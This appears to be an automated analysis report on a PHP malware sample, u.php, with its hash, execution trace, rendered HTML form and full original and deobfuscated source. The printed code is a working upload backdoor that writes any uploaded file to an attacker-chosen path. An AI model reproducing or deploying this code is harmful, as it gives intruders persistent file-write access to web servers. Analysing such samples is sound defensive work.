PHP Malware Analysis

u.php

md5: 18a295e5270dbc65dee56aa4f61d0aa9

Attributes

Files

Input

Title


Deobfuscated PHP code

<?php

$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='{$fullpath}'>BADEXAMPLE</a></h1>";
    }
}
echo "<html><head><title>Upload files...</title></head><body><form method=POST enctype=\"multipart/form-data\" action=\"\"><input type=text name=path><input type=\"file\" name=\"files\"><input type=submit value=\"Up\"></form></body></html>";

Execution traces

data/traces/18a295e5270dbc65dee56aa4f61d0aa9_trace-1676240530.2729.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:22:36.170681]
1	0	1	0.000146	393464
1	3	0	0.000202	395664	{main}	1		/var/www/html/uploads/u.php	0	0
1		A						/var/www/html/uploads/u.php	2	$files = NULL
1	3	1	0.000241	395664
			0.000266	314232
TRACE END   [2023-02-12 20:22:36.170828]


Generated HTML code

<html><head><title>Upload files...</title></head><body><form method="POST" enctype="multipart/form-data" action=""><input type="text" name="path"><input type="file" name="files"><input type="submit" value="Up"></form></body></html>

Original PHP code

<?php
$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='$fullpath'>BADEXAMPLE</a></h1>";
    }
}echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>';
?>